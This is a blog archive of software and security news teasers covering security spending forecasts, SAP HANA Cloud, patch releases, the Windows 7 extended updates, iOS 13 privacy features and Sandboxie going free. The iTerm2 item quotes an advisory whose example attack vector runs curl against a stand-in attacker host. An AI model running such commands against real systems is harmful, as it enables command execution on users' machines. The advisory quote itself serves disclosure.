Category Archives: Software

Spending on security hardware, software, and services continues to increase

Worldwide spending on security products and services will enjoy solid growth over the next five years as organizations continue to invest in solutions to meet a wide range of security threats and requirements. According to an updated forecast from the IDC, worldwide spending on security-related hardware, software, and services will be $106.6 billion in 2019, an increase of 10.7% over 2018. This amount will reach $151.2 billion in 2023 with a compound annual growth rate … More

The post Spending on security hardware, software, and services continues to increase appeared first on Help Net Security.

SAP HANA Cloud Services has Canada written all over it

BARCELONA — SAP’s new cloud data storage products were formally revealed at its TechEd conference last week, and despite a round of layoffs announced earlier this year across its Canadian operations, Canada’s research hubs in Vancouver and Waterloo remain an integral part of SAP’s latest portfolio enhancements, executives told IT World Canada.

SAP’s chief technology officer, Juergen Mueller, took to the stage during his opening keynote on the heels of the company’s other TechEd event in Las Vegas, and explained how the company plans to make it easier for businesses to develop applications across its Business Technology Platform. Front and centre is SAP HANA Cloud Services, which combines all of SAP’s data and analytics capabilities as one set of interconnected services to store, process, govern and consume large volumes of data.

“We are becoming much more business-centric,” Mueller told audience members, acknowledging the fact that there was less of a focus on demonstrations with running code on the keynote stage. “SAP HANA Cloud offers one data access layer for all your data sources. It directly connects to your data from your on-premise HANA system, your third-party systems, and even Excel, without the need for data replication in order to work with that data.”

SAP HANA Cloud can be managed on the SAP Cloud platform using Kubernetes, and will significantly lower customers’ total cost of ownership for storing and managing petabytes worth of data, added Mueller. The company’s research hub in Vancouver has been hard at work for the past five years separating compute and storage with SAP HANA Cloud, ultimately allowing customers to scale both independently.

The expo floor at SAP TechEd in Barcelona. Photo by SAP.

“Vancouver is at the cutting edge of our machine learning and predictive analytics developments. They’re taking machine learning technology, and not thinking about just improving the product but thinking about how to connect it to people and the way they do work,” said Gerrit Kazmaier, SAP’s executive vice-president for analytics, databases, and data management, who spoke with IT World Canada after the morning keynotes.

SAP also unveiled the SAP Data Warehouse Cloud, a cloud-based repository under the SAP HANA Cloud umbrella, which according to Kazmaier, will help customers store petabytes worth of data without worrying about pesky capacity limitations. SAP’s other research hub in Waterloo was largely responsible for laying the groundwork for the repository.

As a result, customers will be able to put their newest or most valuable data in HANA’s in-memory repository and as the data is used less frequently, or “cools”, move it to HANA’s disk storage mode. Customers can eventually move that data to HANA’s new data lake, which is more cost-effective, once the heavy analytics is applied to it. And when data cools even further, they can move it to external data lakes, such as AWS S3 and Azure Data Lake all from within the SAP HANA Cloud.

Neil McGovern, senior director of product marketing for SAP, likened the company’s cloud strategy to the way people store photos on the public cloud.

“It’s the same idea. We’re just doing it with business data,” he explained, adding even C-Suite executives, who have been slow to fully grasp the value SAP can bring to the table due to the complexities around its products and the technology powering them, know the flexibility cloud can provide.

McGovern indicated that if a CIO today demands $25 million for a data centre during a boardroom meeting, there’s almost only one response.

“They’ll look at you and say ‘Go through the cloud instead’, and ‘Why are you employed with us?’”

General availability for SAP HANA Cloud and SAP Data Warehouse Cloud is planned for the fourth quarter of 2019.

Bill McDermott steps down as CEO of SAP

After 10 years as the CEO of SAP SE, Bill McDermott has decided not to renew his contract and will be relinquishing his position. McDermott will be replaced by SAP executive board members Jennifer Morgan and Christian Klein in a co-chief executive officer structure – as per the company’s long term succession plan – while…

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture, with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and/or implementation. This shift has likely exposed companies to a broader range of security risks … More

The post DevSecOps role expansion has changed how companies address their security posture appeared first on Help Net Security.

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

Microsoft introduces several new capabilities to Office 365 and Surface devices

In order to make work and play more intuitive and natural than before, Microsoft has brought about innovations in voice, digital ink, and touch across Office 365. In addition to announcing several new devices at its Surface event, Oct. 2, 2019, aimed at making modern work more intuitive and natural for everyone, Microsoft also shared…

Digital transformation requires an aggressive approach to security

Organizations agree that building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More

The post Digital transformation requires an aggressive approach to security appeared first on Help Net Security.

Adobe to deactivate all user accounts in Venezuela

To comply with an executive order issued by the U.S. government, Adobe is deactivating all accounts in Venezuela. The computer software company will no longer be providing users access to services and software, including free ones, or allowing users to make any new transactions or purchases. 

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most of us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

Microsoft will continue providing Windows 7 security updates for SMBs

According to Alert Logic’s latest research, most devices in small and midsize businesses (SMBs) run Windows versions that are expired or are about to expire soon. Luckily for SMBs that don’t want or can’t upgrade from Windows 7, Microsoft has decided to provide extended security updates (ESU) through January 2023 – if they are willing to pay for them, of course.

Details about the ESU offer

Windows is the most popular desktop operating system … More

The post Microsoft will continue providing Windows 7 security updates for SMBs appeared first on Help Net Security.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Windows 10 1903 on ARM Gets a Virtualization-based Security Feature

Windows 10 version 1903 on ARM has gotten an additional virtualization-based security feature that creates secured regions of memory that are isolated from the operating system. These secured and isolated regions of memory can then be used by security solutions so that they are better protected from vulnerabilities in the operating s [...]

Microsoft drops emergency Internet Explorer fix for actively exploited zero-day

Microsoft has unexpectedly released out-of-band security updates to fix vulnerabilities in Internet Explorer and Microsoft Defender. The IE zero-day bug is deemed “critical”, as it’s being actively exploited to achieve partial or complete control of a vulnerable system.

The Internet Explorer vulnerability (CVE-2019-1367)

CVE-2019-1367 is a memory corruption vulnerability in the scripting engine that could be exploited to achieve remote code execution. An attacker who successfully exploited the vulnerability could gain the same user rights … More

The post Microsoft drops emergency Internet Explorer fix for actively exploited zero-day appeared first on Help Net Security.

$5 trillion threat of cyber attacks spur investments in solutions, talent and tech

IT & Business Services M&A Market’s disclosed deal value reached a whopping $97 billion in 1H 2019 – the highest total on record for a six-month period, according to Hampleton Partners. There has also been a significant rise in valuations, with overall median disclosed deal amount reaching $43 million in 1H 2019, up from $23 million in 2H 2018. Deal volume lessened, with 370 transactions inked compared to 432 in 2H 2018. However, trailing 30-month … More

The post $5 trillion threat of cyber attacks spur investments in solutions, talent and tech appeared first on Help Net Security.

What security and privacy enhancements has iOS 13 brought?

With the release of iPhone 11 and its two Pro variants, Apple has released iOS 13, a substantial functional update of its popular mobile operating system. But while many users are happy to finally get a complete Dark Mode for the device or a better phone camera, some are more interested in security and privacy enhancements.

Location data

On iOS 13, users will be able to control the location data shared with apps with more … More

The post What security and privacy enhancements has iOS 13 brought? appeared first on Help Net Security.

Disclosing vulnerabilities to improve software security is good for everyone

Today, software companies and security researchers are near universal in their belief that disclosing vulnerabilities to improve software security is good for everyone, according to a Veracode report. 451 Research conducted the survey from December 2018 to January 2019 using a representative sample of 1,000 respondents across a range of industries and organization sizes in the US, Germany, France, Italy and the UK. Survey respondents reported enterprise roles such as application development, infrastructure and information security, … More

The post Disclosing vulnerabilities to improve software security is good for everyone appeared first on Help Net Security.

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

The post Product showcase: NetLib Security Encryptionizer appeared first on Help Net Security.

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

The post The use of open source software in DevOps has become strategic for organizations of all sizes appeared first on Help Net Security.

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

The post BotSlayer tool can detect coordinated disinformation campaigns in real time appeared first on Help Net Security.

Sandboxie becomes freeware, soon-to-be open source

Sophos plans to open source Sandboxie, a relatively popular Windows utility that allows users to run applications in a sandbox. Until that happens, they’ve made the utility free.

About Sandboxie

Sandboxie creates a virtual container in which untrusted programs can be run or installed so that they can’t maliciously modify the underlying OS or data on the host machine. It can make the use of apps such as browsers, email programs, IM clients, Office suites, … More

The post Sandboxie becomes freeware, soon-to-be open source appeared first on Help Net Security.